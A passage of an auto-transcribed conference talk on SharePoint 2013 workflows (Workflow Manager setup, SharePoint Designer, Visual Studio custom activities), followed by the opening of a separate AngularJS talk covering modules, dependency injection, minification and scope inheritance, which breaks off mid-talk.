invested heavily in SharePoint 2010 style workflows, the only thing you can do is that you can instantiate a 2010 workflow from 2013 workflow, and a 2013 workflow from a 2010 workflow, and that's it. There is no point-and-click upgrade process, and this applies to even all the third-party products that have invested heavily in workflow foundation, and so they're going to have to come up with their own solution. There are a lot of limits that apply to workflows. You'll get a copy of all these slides, so there's no need to read each one of these one by one. But as you can see, there are a lot of these that are sort of absurd, like workflow postpone threshold, 15. That's 15 concurrent running in some workflow timer batch size, 100. It picks up 100 jobs at a time. Workflow associations, not published, 100 per list. So there are a lot of these limitations that feel like they're pretty low, as in that you can't have a... It's not something that can support thousands of users on one web front end, for instance, which is not that much to ask for. The good news is most of these don't apply to SharePoint 2013 style workflows. SharePoint 2013 style workflows, there's just a couple of these in here. The maximum workflow definition size is 5MB. So if you return 5MB of XAML, well, maybe there's a different problem there, but that's the maximum size you can go to. That applies to SharePoint 2013 style workflows. I'd say that is not such a big deal, and you can go up to 121 levels deep in nesting your workflow. Well, that's not such a problem. 121 levels is quite a lot. There is another limitation that the workflows you want to talk to on-premises service bus on Windows Server App Fabric. There's a timeout issue because it's basically a WCF service you're talking to, but that's like 120 seconds. Again, not that much of an issue. So the workflow limits for SharePoint 2013 style workflows not so bad. Let's talk a little bit about setting up workflow manager. Setting up workflow manager is quite easy. Step number one, you have to install workflow manager. On a Dev machine, when they RTM the product, you could not install it on the domain controller. In Beta2 you could, but in RTM you couldn't. So I had a little chat with the program manager at work, and I was like, hey, this is really going to kill a SharePoint developer. You have to allow us to install it on a domain controller because on our development VMs, we have a domain controller. We don't want to have to run two VMs. SharePoint alone is heavy enough as it is. So they made a little change in the product in literally 14 hours, and they introduced workflow manager 1.1, which you can install on a domain controller. So when you install it, it'll go through some prerequisites and it'll update those on your server. And if you don't have access to the internet, I've included the offline installation command. It uses WebPI, but this offline installation command will basically go through the steps of, you know, it'll download all the necessary components. And I can tell you on like two images, it gives you like a 404 not found, but everything else is downloaded. And you'll copy this entire installation, take it to your SharePoint server, double click install. And I have a book on Amazon setting up your SharePoint 2013 dev VM, and I detail all the steps in there, including like end to end setting up your SharePoint VM. So you download workflow manager, double click on it, start installing it, right? Basically it takes you through a little wizard, right? It's a configure refresh, then after it is installed, it'll present you with a screen like this, right? And this will allow you to set up workflow manager. It's very simple. It'll ask you some basic questions like, I need to talk to a SQL server database. What ports do I want to use, etc. Right? So basically, and you can also join an existing workflow manager form. So then basically it goes through this wizard, it gives you the option of doing this to PowerShell if you wish, right? And it'll actually generate the PowerShell script for you. And then you basically set this up, right? So at the end of it, workflow manager is set up. But then you have to do one more thing. And the one more thing that you have to do is to register the workflow manager inside of SharePoint, right? So by default, not every SharePoint site will be able to use workflow manager. You have to explicitly allow it to be used. And I'll tell you all those historical sites like the blank site and the enterprise, you know, the meeting workspace and all those. They cannot use workflow manager, right? In fact, they've been removed from the user interface, but they're still there. And if you're using a SharePoint site in like SP2010 compatibility mode, it'll run fine in SharePoint 2013, but it won't be able to use SharePoint 2013 style workflow. You know, running this will set up two IS websites. One will be running on HTTP for dev purposes. Another, they'll be running on HTTPS for production purposes. One golden rule about SharePoint 2013, everything should be HTTPS. Everything, including on your intranet. So one of the big changes, as you know, they've introduced as the apps model. I'm here for the rest of the day, if you know, you're going to chat about apps or anything SharePoint 2013 in general. I would love to brainstorm with you, right? But as a golden rule, everything in SharePoint 2013, even on an intranet, has to be HTTPS, or I would not consider that as a production worthy SharePoint installation. In fact, there's so far about insisting on HTTPS that when you, you know, export an app out of Visual Studio, they won't let you specify an HTTP URL. Now, of course, you can get around it by, you know, renaming the app file to.zip and editing the XML and all that. But they try very hard to discourage you from basically using HTTP URLs. Dev is fine, production absolutely not. And this is the command you use to pair workflow manager with a SharePoint site collection. Okay? So this is great. I mean, it works. It allows over HTTP, that's for dev purposes only. But do you see a big problem with this command? Right? Basically what you have to do is you register at a per site collection level. You can't say this entire web application uses it. So as new, I mean, you can run a PowerShell command that runs this in a loop and basically sets this up for all site collections that are currently in existence. But what if you create a new site collection? Right? You have to either run this PowerShell command again or basically write a feature, farm solution, to be able to do that. Right? That's something to keep in mind. So when we talk about workflows, there are three main things to learn from here. We talked about how to set up workflows. We know the history of workflows. Now there are three main things to talk about. Number one, what are the improvements in SharePoint Designer? What does it feel like writing workflows for SharePoint 2013 style workflows in SharePoint Designer? Second, what does it feel like to write Visual Studio 2012 workflows? And third, writing a custom workflow activity. Now this talk is just one hour, so I'll try and compress time a little bit. This is my SharePoint environment. I have central administration running. And I have a team site created. Remember that a blank site can't use these workflows. Even a blank site in 2013 mode can't use these workflows. So you see that I've created a site collection at slash site slash WFS. So this site collection has the ability to run SharePoint 2013 style workflows. I've ran that PowerShell command on it already. So I'm going to go ahead and open, let's say, SharePoint Designer. And I'm going to open this site in SharePoint Designer. So everything is running on my VM. You work with SharePoint to know that, you know, VMs can sometimes misbehave. So I open HTTP sites WFS, and I'm going to look for the workflows node over here. Okay? And click on this. So Golden Rule with SharePoint Designer. Wait for this red thing to go away before you do anything. So here we go. So you see here that I already have a workflow, right? And you see here that I have a bunch of buttons up here. List workflow, pretty much the same as a SharePoint 2007 style workflows. Hardtys everything to a list. Reusable workflow, you tie it to a content type. Site workflow that you don't need to tie to an item, runs at a site collection level. You know, so those are things that are, you know, same as before, right? All these settings are probably pretty familiar to you. They've introduced a couple of interesting things. The import from Visio, they've added the option of importing directly from Visio 2013 diagram. That's the VSDX format. It doesn't need to be, it doesn't need to be a VWI format anymore. So that's an interesting thing. I'm going to go ahead and add a new workflow. I'm going to say new, let's say, let's go with site workflow. Actually, now let's do reusable workflow. So you see here, same as before, with one big difference. You see this content type is all and it's disabled, because I've selected a SharePoint 2013 style workflow. And if I choose SharePoint 2010 style workflows, I can associate it with content types, right? So SharePoint 2013 style workflows can't associate it with content type anymore. So I'm just going to go ahead and create, let's say, a test workflow and click OK. So you see here that it presents me with what they call the text-based view of my workflow designer. And I can, you know, start typing in, you know, activities just like I used to before. So I can say, let's say, so as I type this, I hit enter, you know, it gives me that, you know, these various options, right? I can go ahead and rename a stage, I can choose to add more stages. So I can say, go ahead and add another stage, right? So I can call it first stage. And here I can go ahead and add a second stage. And then let's say add two more stages. So let's say my logic over here is that the first workflow does something like start, then the second workflow checks for something, and then it redirects either to the third stage or the fourth stage. Like a success or a failure. So I'm going to add two more stages, call one of them success, right? And then I'm going to add another stage at the end here. So I got to come in here and add another stage and fail, OK? So I've added these stages and they appear in sequence, but that sequence is actually, you know, arbitrary, because really the workflows are connected to each other through arrows, like, you know, so the sequence over here, the kind that I'm visualizing in my mind is like a Y structure. So first stage, then there's a decision, and then I go to either success or failure, right? So how can I visualize this as a Y structure? You know, in the previous version of SharePoint, what I had to do is that I would have to, you know, you know, I would have to export this to like a Visio format, try and visualize it over there. But now I can just go here and I can go to something called as a visual designer view. And in the visual designer view, it is generating the Visio stencils and that the visual designer view will be disabled if you don't have the right version of Visio installed. So since I have that version installed, I can, you know, basically view this like that, right? And I can, you know, I'm going to try to zoom out a little bit so we can see the whole thing, right? So this is how my workflow looks like. If I was to drop activities inside of here, so I can basically start going back and forth between these. So I can go back to the text-based designer and here I can just go ahead and add a log to show you that workflow started, okay? So I added this activity here. I'm going to go back into this visual designer, it's thinking hourglass, and you see here that, you know, the workflow appears inside of here, right? And I can now go ahead and start arranging these in a different way if I wanted to, right? I can say this basically goes down here and this is the Y pattern and, you know, and from here I can go ahead and connect these dots like a connector tool. So I pick this and it's a little tricky. You have to basically hover right on the block where that square appears and connect it from here to here, right? And I can, you know, go ahead and craft up my workflow like this. And then, you know, I can also do something called a generate stage outline. Now I have to resolve these issues. But in a stage outline what happens is that it gives me like a zoomed out view of the workflow. So, you know, it's basically if I want to see the details I go inside the view, but if I want to see an overview I go to a stage outline view, so it just shows me just the outlines of the stages that I don't want to see all the activities inside, right? So I can do all of those things. Let me go back to the text based view. Oh, now it won't let me go there. So let me just create a new one. So I'm going to go ahead and create a new reusable workflow, test two. And I can also go ahead and start introducing loops inside of here. I can try to introduce something called as loop end times or loop with a condition. And, you know, basically, you know, so this is again something that, you know, doing loops has become fairly convenient. And cut-paste, copy-paste, those things also work, right? So I can just go in here and say run this loop, you know, ten times for instance. And, you know, whatever is inside of there will run ten times, right? So writing a workflow in SharePoint Designer has become a lot easier. I've also deployed a custom activity over here. And the custom activity is something called as, you know, it basically goes out to YouTube and fetches some songs. So I can go in here and I can say YouTube. And see, it finds my custom activity inside of here, right? I can enter and then in this custom activity, you know, I can configure it in a certain way that I can pick the category, number of songs, and output to a certain variable type. So I can make this like a drop-down. I can go ahead and say top 20 songs and I can output to this variable called response content. Basically the output type of this particular activity was a new kind of data type. They've introduced something called as dynamic data. And what dynamic data allows me to do is that it is great to be able to stuff in hierarchical information like JSON, hierarchical information that I don't know the structure of ahead of time. And then I can work through that information in a syntax that looks very familiar to Xpath, right? It's not Xpath, but it is very similar to that, right? So using that structure, I have the ability to, you know, look through that data. So the response content automatically added a variable for me of data type response content because, you know, it knew that this was the output type. And this has been basically been set up over here, right? I can add more variables. I can access these variables, et cetera. Anyway, that's how you write a workflow in SharePoint Designer. Let's dive into Visual Studio and I'm going to put all these together in a working example at the end. So I'm going to start up in Visual Studio. I'm going to go ahead and create a new project. And I'm going to go into Office and SharePoint and I'm going to go ahead and create a Sandbox solution. You can do this as an app also. Right, so I'm going to go ahead and create a Sandbox solution, right? Click empty project, right? Okay. And that's fine. And I'm going to target slash site slash WFS. Okay. So in here, I can go ahead and I can say right click, add new item. Remember, this is a Sandbox solution and now I have the ability to write, you know, a workflow in a Sandbox solution. But you see that the older project models, the sequential workflow, state machine workflow, still there, these are the SharePoint 2010 style workflows. So I'm going to go ahead and add a regular workflow. I can also choose to add a custom activity, right? And you'll see that the editing experience of both of them is actually quite similar. So I'm going to go ahead and add a workflow. I'll basically make it a site workflow. Hit next. And history list. I'll just, you know, pick the existing history and task list. Hit next. And user will start it manually and hit finish, right? And let's wait for this to load up. Now, you see that there is one big difference that I see over here already. There is no on workflow initiated activity over here, right? In the previous version of SharePoint workflows, 2010 style workflows, I had to be very sure that the first activity was on workflow initiated because like if I put my activity on top of that, basically everything was screwed up, right? My workflow would not run. And sometimes I ran into situations where even if I moved my activity down there, it didn't really fix the workflows. I had to do like a get latest from source control again. Anyway, so you can see here that I can start writing activities inside of here, but I can also do something like create variables, right? So I can create global variables. Let me actually, before I create variables, let me go ahead and drop an activity inside of here. Just any random activity. So let's say create list item, okay? So as I drag drop create list item here, it shows me these exclamation marks. It says one of the children has validation error warning. So list ID was not supplied, right? So I have to specify a list ID here. And now visual studio is frozen. It's basically talking to SharePoint. Okay, right. So I have to specify a GUID. Can I query this GUID in a way? Yes. Basically, it's a simple REST call to be able to query that GUID. And I can drop a HTTP send activity to be able to query that GUID. But I'm guessing that when I query using HTTP send, I would want to store that variable, the output of it somewhere. And this HTTP send is going to return me a value and it's going to be JSON. So how do I parse that JSON? So I'm going to create a value or a variable at the global level, at the sequence level. So I'm going to go to variables and I'm going to say JSON output. That will be the name of the variable. And the variable type, I'm going to basically browse for types and I'll search for dynamic. Dynamic value. Okay, here we go. So to support this dynamic value concept, you know, they've added a whole bunch of activities and improvements in the framework to be able to do that. So I added this dynamic value activity and now I can basically say list ID is equal to that, what was the, forgot the variable name now. But I can just type in the variable name here and, you know, that is how I can exchange information between these. I can also go to this HTTP send activity and it's sort of like a composite activity. Basically, I can use like a tree view or a breadcrumb sort of a way to craft my workflow and I can go from one activity to another to another. The cool thing is that everything that I'm doing over here is declarative. What you won't find in here is right click view code. There is no such ability. I can't have code behind to this, right? Completely contained in XAML. This workflow is completely contained in XAML. Now what is it like? So this is, you know, a simple workflow being deployed as a sandbox solution. We'll see a full example later. But let's also see how you can write a workflow activity. So I'm going to say right click, add new item and I'm going to choose to add a workflow custom activity. Now when I choose this, I'm creating the new good kind of activity, the kind you should, right? So the XAML kind of activity. I'm going to click on add and it looks very much like writing a workflow, right? In fact, if you know how to write a workflow, you already know how to write an activity. It's basically the same way I can drag drop, I can build URI, I can get S2S security, token, right? I can do all of these things inside of here. Get S2S security token. They've given us the ability to get that token so we can make an authenticated call into SharePoint when we are running as an app, right? So generally I would want this, you know, above here, right? So I can edit the workflow very, very easily over here. So this is pretty good. How do I deploy this activity? If you go in here and you see that there is this actions for file. I have to do two new things. I basically just edit this actions for file to draft up the details of my activity. There is no visual designer for it. You have to do it by hand, but it's not difficult. And what I do, I pick a file from my C drive and I edit that. That's the easiest way. And I have to come in here and go to the features node and double click on feature two. You see that my activity has been, okay, so they fixed this bug. So this is in the previous preview, they would set this to a site level feature and then my activity would show up. So this has to be a SP web level feature for the activity to show up inside of here, right? So now I can go ahead and package this up as a WSP, hand it over to somebody, and they can deploy it and the workflow can run. So next I'm going to talk about, you know, a functioning example of, you know, writing a full activity and we'll see how exactly that works. But before we do that, let's cover some concepts about activities. So we talked about writing workflows in SharePoint Designer. We talked about writing workflows in Visual Studio. Now let's talk a little bit more about custom activities. A workflow is made up of activities. Why did Microsoft give us this ability? Because Microsoft can't imagine every scenario that we may have to deal with. You know, clicking on this button, uproves that travel expense in an ERP system and turns that TV on. Microsoft couldn't get this, right? So we have to have the ability to write these activities. Generally, a workflow is made up of activities. The XAML file, if you were to open up a notepad or right click view code, this is what you will see there, right? So it's basically a sequence and a bunch of activities in here. So you see P, build dynamic value, right? HTTP send, right? So this is how a workflow looks like. And activity, there are two concepts we need to know. Activities and actions, right? So an activity is what we use, right? Is what we use in a workflow is an activity. And an action is what an activity is built on. So an action is like, you can think of it as a, you know, my class library that implements this action, right? So generally speaking, 99 out of 100 times, you'll see there is a one-to-one mapping between an activity and an action. Sometimes there are exceptions, like start a workflow, list workflow or site workflow. Underneath the scenes, it is basically the same action, but with some XAML, we can make it look like two different activities, right? So you define these actions in a new file format called as.actions4, right? It is embedded deep down inside your SharePoint 15 hive. It is farm scoped, but now you can also deploy it as an app or as a sandbox solution, okay? So this.actions4 is a successor of the.actions file. By the way, when you say deploy it as an app, one thing I want to mention, even if you're using provider hosted apps or workflow, you're going to need an app web, right? Because that's where you register the workflows. You need an app web there. So it is a succession of.actions file. It is located at that place, and it basically contains a list of workflow actions or workflow for. This is basically where it lives, right? So you can see the.actions file is there. That's the older kind. And then the.actions4 file is there. So right here, I open that in Notepad, copy an existing activity, and start making changes to it. And this is what the out-of-the-box activities look like. For instance, you see that trim string activity, right? So you see here, it's got something called as I have an action class name assembly applies to all category utility actions, okay? It's pretty self-explanatory what that is doing, okay? Then I say rule designer, sentence, trim percent one, output two, percent two. You know in my activity, I had, you know, download from YouTube in category blah. That blah is a parameter, right? And that parameter, you would say percent one, right? And in percent one, down here, then you can define all the parameters and also the data types of those parameters, right? So this is how you write the.actions4 file. Like, it is XML. Yes, we have to edit that XML. But you see that it's not very hard to edit, right? You see here, this is like one action and I define the rule designer and then I define the parameters. And this basically crafts up my activity, right? So as I mentioned, there are two kinds of activities, declarative and coding activities. You know, we should just go with declarative. So I'll just code activity, just avoid it if possible. Already talked about dynamic value, so I'll skip over that. Pre-requisites, write an activity, what do we need? We need SharePoint 2013, we need workflow manager. We need an environment that is running SharePoint. But the good news is that, you know, if you're writing an activity that is completely decorative, you don't even need to run on the SharePoint VM. You can run Visual Studio on a Windows 7 or Windows 8 machine and target Office 365 or target an on-premises environment, right? That will also work. But you do need the developer tools installed, the Office developer tools installed. So let me go ahead and dive into a fully functional example. So this is a custom activity that I've written, that, you know, the same activity that basically gets songs from YouTube. Double click on this activity node. You'll see here that I am, you know, there are two activities inside of this. So one activity has got two activities inside of it. The first is build dynamic value. Second is HTTP send, right? So basically what I'm doing here is I drop these activities and I basically want to be able to craft up like a JSON URL with all the details. And then I do an HTTP send, which is just a JSON API to call a YouTube, right? And this is a URL. And then I basically output that value into a sequence level variable. It is there, believe me, it's somewhere there. It is there, but it outputs the value into a dynamic value type of an output variable. Once I've done that, I've crafted up the logic of my activity. Then I open the actions file and I start crafting up, you know, how this will look like in SharePoint Designer. So when somebody searches for my activity, the sentence I want to show them is search YouTube clips in this category to top block, right? So this is how it will look like in SharePoint Designer. Number two, I basically say that I field bind id is equal to one. So for the first field, right, these are the drop down values that appear, right? So these are the possible values that the user can pick. Then the top end, I say that this is going to be off type, you know, integer and, you know, designer type text area display name top end. And the last one is going to be dynamic value and the parameter data types are declared down here. This one is a string actually, right? So I define the data types, I define my workflow activity like this, right? And you see here that this is getting deployed as a module tag, okay? So basically I copy them into a certain location inside of the content database using SP Web level feature and I deploy this and soon as I deploy this, SharePoint Designer can see this activity. One thing I'll mention to you is that let's say we deploy this and you don't see this activity in SharePoint Designer, okay? What SharePoint Designer does is that when you open SharePoint Designer, it downloads all the data in the SP Web, okay? And it caches that deep inside of your C user data folder somewhere, right? And if you don't see the activity, you need to go in there manually and delete that cache and then open the site again in SharePoint Designer and you'll see it. There's a little issue in SharePoint Designer. So now I've crafted up a workflow based on this activity. I'm going to click on Edit Workflow. So as you see here, that my workflow has got one stage and it's got one step and a loop, okay? And step number one is I'm calling YouTube, right? And I basically search in the Music category, Top 10, Output to this variable, right? Then I've created a global variable called Index, right? Index, the purpose of this index variable is that I've gotten the first 10 songs. I'm going to run a loop 10 times and I'm going to increment Index one by one. And I want to be able to find this particular data from the output JSON value, right? So this workflow knows a little bit about the JSON structure. If the JSON structure changes, my workflow will break. But if the workflow breaks, it actually gives you a decent place to see the full exception message now. Basically, the workflow history shows you like an exclamation mark. You hover on it, shows you a tooltip with a full exception text. And it's actually pretty easy to read. Variable response content, output variable title, okay? And then I create a list item in a list that I've already created, right? And output this to a variable called Create, okay? So then I increment the loop count and then I rerun the loop, right? So when the loop runs 10 times, I've extracted all the items. And basically that's all I need to do. Then I would save this workflow, I would publish this workflow, and now I have the ability to run this workflow. So I'm going to go to my SharePoint site. This is a YouTube list. I don't see any data in here right now. I'm going to go ahead and visit that site in a separate tab. I'm going to say site-level workflows. I'm going to go to Site Contents, and I will look for Site Workflows. And I will start this workflow. So hopefully I am online. Hopefully, we'll see. Yeah, so I am online. And if we give it a minute or so, you see that it was able to download the first 10 songs, top 10 songs. Looks like Gangnam Style is on top again. So I was able to get the top 10 songs from YouTube and put them inside of this list. I was able to achieve this with Zerocode. I can use another new facility in SharePoint 2013 to create a view on this list using a new facility they've introduced called JS Link. Writing a view using JS Link is extremely simple. The good news over there is that I can write a view in JavaScript. I don't have to do it in XSL because you can't debug XSL. So if I do this in JavaScript, I can set a breakpoint. I can see what's going on. I can use CSS. I can use JavaScript. You know, that's how we write views in other platforms. Now you can do that in SharePoint. And I could easily also save the URL of the video. That's part of the JSON feed and render that as YouTube clips. That would maybe take 10 minutes to do. If I had the embed tag ready, it would probably take 10 minutes to do. So it's very easy to be able to set up something like YouTube or whatever scenario that you may envision. You can do that very, very easily using Workflow Foundation now. Okay. Last tips. I have seven minutes left. It will open for questions. A couple of best practices. Number one common mistake I've seen with Workflows is to use a Workflow history list as an audit log. Because you know, you say, hey, Workflows are great because if anybody changed something, you can go in there four months later and look at the audit log and see who changed it. Right? Okay, sounds good in theory. The problem is, Workflow generates a lot of audit logs and that audit log list is going to get bigger and bigger and bigger and bigger. Right? So the Workflow history list, what you have to do is you should set a policy on that to move items out of that and archive them somewhere else. Okay? There's a list of millions of items. Not a good idea. Number two, keep initiation activities to a minimum. Right? So when the workflow starts and the first activity, you just have basically like a placeholder activity. And the end user perception will be that the workflow started quickly. You know that's working on its spinner. You won't see that for a long time if you don't have a heavy initiation activity. Number three, for very large lists, when you upload a new version of a workflow, set the old version of the workflow to no new instance. Because if you were to not do that, basically if you remove the workflow association, it basically, you know, removes that column that is associated with the workflow. And removing the column, the time taken for that is directly proportional to the number of items that you have in a list. Right? So if you have a very large list, remove instances in the middle of night. Right? During business hours, set it to no new instances. And obviously, don't let workflow manager or any of the S2S certs expire. There's some PowerShell scripts out there that you can run easily on your farm and find out exactly what certs are about to expire. And that is something that you should diligently do, because then this is a problem we'll run into. You can analyze workflows in two different places. They've added, this is new in 2010, 2013, that they've introduced a category called Microsoft-Workflow. Any errors, etc., in workflow foundation will show up there. And a second location is that they've, in the database in workflow instance management DB, there is a table called debug traces. It is perfectly okay to run a select out of this. You can run a select out of this. And if there are any issues that you're trying to diagnose around workflows deep down, you can do that from here. Here are a couple of links and references that I've included, and you'll get a copy of all of these slides, or just email me and I'll send you this list. But these are, if you're interested in SharePoint 2013 style workflows, in SharePoint or even otherwise, this is a very good reference for that. And please leave a feedback. Hopefully it's green. And I'd love to take any questions at this point. And thank you for attending.
|
So is the 2013 story any better? A rundown of what I like about SP2013 workflows, and what I don’t (which is very little).
|
10.5446/51503 (DOI)
|
Hello out there. Can you hear me? Yes. Okay. My name is Scott Allen and this is a talk on AngularJS. I usually skip some of the opening formalities. I assume if you're here you know what Angular is about. It's a framework for building complex client-side applications. If you do a search for it you'll find out the AngularJS website where you can download the framework. You can find the documentation. You can find some samples. And basically what I wanted to do today was walk you through some of the primary abstractions of AngularJS and show you how to build an application using things like directives and filters and data binding expressions, all those sorts of things. We will start with an empty page which is my default.html page. Currently this page just has some styles included. It has this funny little expression with the double mustaches, 2 plus 3. We haven't included Angular yet. And so right at this point that's the test. We haven't implemented anything yet so they all fail. Right now it just displays that 2 plus 3. So we'll include Angular. We just need Angular and a script that I'm rating in. No jQuery required. We'll talk about that later. Include Angular. Just doing that doesn't give us anything yet because once you have the Angular script included what you need to do is start adding directives to your HTML. So directives are these Angular abstractions that integrate very tightly with the DOM. You add a directive using typically ng-attributes. I'll show you how to build a custom one later. This is me saying dear Angular, please take control of this body DOM element and everything inside of it. And what Angular will do is it will look for directives like ng-app which you can also, by the way, if you're into HTML5 data validation or HTML5 validation you can add a data-prefix to that. It'll find that attribute and look through what it controls now, everything inside of the body, and look for other directives and expressions like 2 plus 3, compile them, evaluate them. So I refresh the page now and I get a 5. So this is not JavaScript that I'm rating inside of here. It's a subset of JavaScript that Angular will understand inside of these data-binding expressions which is the double mustaches. It'll look for those things, evaluate them. Typically what you don't do is hard code things, of course. Typically what you do is you have some sort of model. So there's the concept of models which is the data that you want to put onto the screen. Controllers which initialize the model. So we'll get into that. So first of all, typically don't do this. Let me do something a little more interesting. Let me have a div that's going to data-bind against something called name. And let me have an input type text that will use another directive, ng-model. So I can say data-ng-model. And that is going to also look at something called name in my model to figure out what it should display in that input. And what I want to show you first of all is an example of 2A data-binding. The fact that I'll be able to type into the input, it'll update something called name. It's also displaying in this div. And before we all do that, I'll make this a little more formal and say that I want a specific application. So an application that I'm going to configure with routes and controllers, I'll just call it myApp. But now as soon as I do that, Angular is going to start looking for something called myApp. So we're going to write that in the JavaScript. I'll create a independently, or immediately invoked function expression in iffy. Once I apply the proper curly braces here, it gets invoked. It gets closed off. I'm going to say the application is an Angular.module called myApp case sensitive. And this is how you create a module in Angular. So a module is simply an abstraction that you can use to group together different components. Some of the things we'll be looking at later, like controllers, filters, directives, services, you can put them into modules. The advantage of doing that is then that modules have configuration code that can run, that can get bootstrapped. We'll see how dependency injection works with modules. This is the name of the module. This is the list of dependencies for my module, just an empty array because I don't depend on anything else as yet. That will create that module and then I can do things like create a run function. So app.run is the ability to register a function with Angular to say this is a piece of code to execute when this application is up and running. I'll actually create that as a separate function as first. So run is a function. And I'm going to throw in two parameters to this. One called root scope and one called log. And we're simply, first of all, just going to log that the application is running. And I'll explain what these parameters are and why they're named that way, but then I'll register this run function. And I think if I did everything right, I should be able to also say root scope dot name, initialize this name property that we're going to be displaying and data binding against. We could just say it's the app. Save everything. Refresh the page. There's the app and the app in the div and you can see the application is running. So we executed our run code. I should be able to type in here now. Scott Allen. And that's one of the big benefits of Angular, the ability to have very simple pieces of JavaScript model that I can just inside of the view that has no idea what the model exactly is. Inside of the view, it can have these data binding expressions and say, I'm going to take this name and put it into an input, put it into a div. When the name changes, I want Angular to automatically keep things in sync and update the DOM elements and do all that good stuff, right? The way I'm doing that right now is I'm attaching something to an object known as root scope. So Angular is very interesting. It's a very interesting framework. It has a lot of concepts like dependency injection. When you put parameters on a function that Angular is going to call, Angular can actually analyze those parameters and figure out what you're asking for. So this one's a little easier to understand, the second parameter actually log. I'm asking Angular for the built-in log service that it has. And you can replace that service, you can decorate that service, you can do all sorts of interesting things with it. But the built-in service that comes with Angular, when you call.log or.worn or.error, what it will do is write something to the console, console.output if it's available. So there's an actual dependency injection component behind the scenes that when this function runs, it says, oh, $log, you need the log service. And it literally is looking at it by name because in JavaScript, we don't really have types. You know, in C-sharp, if you've done dependency injection, you're probably used to injecting an i-logger, an i-repository, things like that. But there's a type there that an inversion of control container can look at and say, oh, you need the i-repository, let me look that up by type name. I found one, I'll give it to you. JavaScript, we don't really have types. So it's literally looking at the name. So one thing to be aware of right from the start is what happens when a minifier runs on this code and changes these things. I was just going to give you a really quick demonstration of that because I'm using bundling and minification inside of ASP.nmvc4. And if I look at my bundle config, I have a bundle defined for my script. You don't really have to be familiar with MVC4 to understand what's going on here. But if I reference this URL, I will be getting a script that is minified. That's the big difference. It's been minified. So you know, a minifier likes to change local parameter names to make them as short as possible. Let's see what happens if I go into my default at html and instead of including my script, let's include this name, which was bundles my script. So script source equals bundles my script. I think that should work. Run this again. And we will get an error. So whenever you see something like this, unknown provider, n provider, that's Angular's way of saying that you just wrote a function that has a parameter named n and I have no idea what n is. So how do you deal with minification? We could actually look at our minified source code and see that in there. If I look at my scripts, so there was my run function that was rewritten with two parameters, n and t, to make them short. All right. So how do you fix that sort of problem? There's a couple different approaches. One, actually, I can think of three. One is to use an Angular friendly minifier. I forget the name of it. I'm sorry, you can Google that. Another approach is to do what's known as what they call annotate this function. So any function that the dependency injector is going to work against, you can give that function a property $inject. And inside of $inject, you can give it the array of things that that function will require. Right now, we're requiring root scope and we're requiring log. And the injector will look at that instead of the actual parameter name. So I could call this anything now. I could call it n or l or what have you. Just doing that should fix my problem. Let me just do one little thing because it aggressively caches these scripts. Let me just add a little query string to make sure we get a new version of the script. Yeah. So application is running and we're back up data binding and so forth. If that makes sense. Am I making any sense? Sometimes it's hard to tell when you can't see people. But cool. Let me not use the minified script just because it does get aggressively cached and then that throws things off. We'll go back to just using my script.js. All right. So that's a little bit about dependency injection. Angular does dependency injection. So if you want to write unit tests, have a fake log service, very easy to do and you can make sure that things like the application are actually calling into the logger. But this is typically not what people do. Typically people don't put their model in the application. Typically what you do is you write a controller. So I want to have a controller called a numbers controller that is actually responsible for this part of the DOM. It's going to be responsible for setting up a name, calling a web service to get the name and then setting that in the model and then Angular will take care of displaying it here and updating it from this input. So if I have a numbers controller, of course Angular is going to go out and look for a numbers controller. So I'll have to write that next. So back in my script.js. I'm going to put this in a separate iffy. Not because that's required. Just because I want to demonstrate that you could put the application in one js file and the controller in another js file and organize your application however you want and use different folder structures. So this isn't required just doing this here to make a point. I am going to pass in. I know I want the Angular module called myApp. So I want to get a reference to that module that I've already defined. MyApp. So no second parameter here. That would try to recreate it. I just want a reference to myApp. Pass that in as the module to this function. And then ultimately what I have to do is register a controller. The numbers controller. So numbers controller could look like this. Numbers controller is a function. And let me make sure I try to spell everything. Right. It would be 2Ls not 2Rs. Right. Yes. This one we could also give it a scope and a log. And let's say log that numbers controller is up. Up and running. Scope.name equals scott. We should also provide the injection here. Copy that. Just in case it gets minified. So what we're asking for this time is scope and log. I'll explain the difference between root scope and scope here in a second. And let me comment out this line temporarily. It's our controller that's going to be responsible for setting up that scope. And then finally module.controller. I'm telling Angular there is a new controller to be aware of. The numbers controller which when someone asks for the numbers controller here's the function to invoke to set things up. So doing that and refreshing. Hopefully. Oops. Let's see what did I do. Oh run is not defined. Let's see what I did up here. That's interesting. Run where? Oh. Yeah. Yeah. Yeah. Thank you. This should have been numbers controller.inject. We're annotating that function. Very good. So we're working. Thank you, sir. So that's still working. All right. So a little bit later we'll call a web service. We'll get some data. We'll bind it into the page. But before we do that I really want to explain the concept of scope in Angular because it's extremely important. When you set up an HTML page and you put these directives in place like data.ng controller, what you're telling Angular is that this controller is responsible for this part of the DOM. And so any expressions that are inside of here are going to use the scope that is defined by that controller. And you can have controllers inside of controllers and controllers inside of applications. And the important thing to understand about the scope is when it goes looking for name, it's literally looking for a property name that is defined on the scope that was set up by that controller. But this scope, when you have things inside of each other, the scope controlled here inherits from the prototypes, inherits from the scope that's set up by ng application. And that means if we were to not define a name here and instead have the name defined here, JavaScript will find that, right? There's some things in Angular where you just have to be very familiar with pieces of JavaScript. So if you're not familiar with prototypal inheritance in JavaScript, you might want to read up on it. There's a great article out here that I wrote a number of years ago called prototypes and inheritance in JavaScript. If you Google for that, you'll find it. I'm not trying to plug myself. Just saying it's out there, and I think it's pretty good. But it'll explain to you that when JavaScript walks up to this scope object and it says, please give me the name property, what the JavaScript runtime will do is look in that scope, not find a name. So it follows the prototype reference which Angular has set up to point to this scope. So it'll go to that object and say, please give me a name. And there it'll say, yes, we have a name. So it takes that value, puts it on the screen. So if I run this now, even though we don't have scope.name in the controller, since we are asking for something called name, that should be found. And it should be the app. So where does this become really interesting? Let's take this controller or this block of markup. And what we'll do is we'll have a numbers controller inside of a numbers controller. And I'm also going to take this little bit of markup and put it outside of here. Control K, control D to do some formatting. So think about this for a second. When it looks for name here, where is it going to go? It's going to go to the app because that's the abstraction that's in control of everything inside the body element. When it looks for the name here, it's going to look for this numbers controller that was instantiated. When it looks for this name, it's going to look for it in this numbers controller that was instantiated. But since none of the numbers controller defined a name right now, if I type something up here like this is the app, they're all picking up essentially the same name property, right? This particular text box is saying give me the name, doesn't find it there, follows it to the next scope, to the next scope, eventually hits that name in the root scope. Where it gets tricky, if you ever get in this nested controller situations when someone does this. So what happens there? Well in JavaScript, when you write to an object, you never write into the prototype. So when I put something in the input here, Angular is saying, oh, I have to set the name on the scope. So it literally sets the name on the scope of this numbers controller and that effectively hides the one that's in root scope. 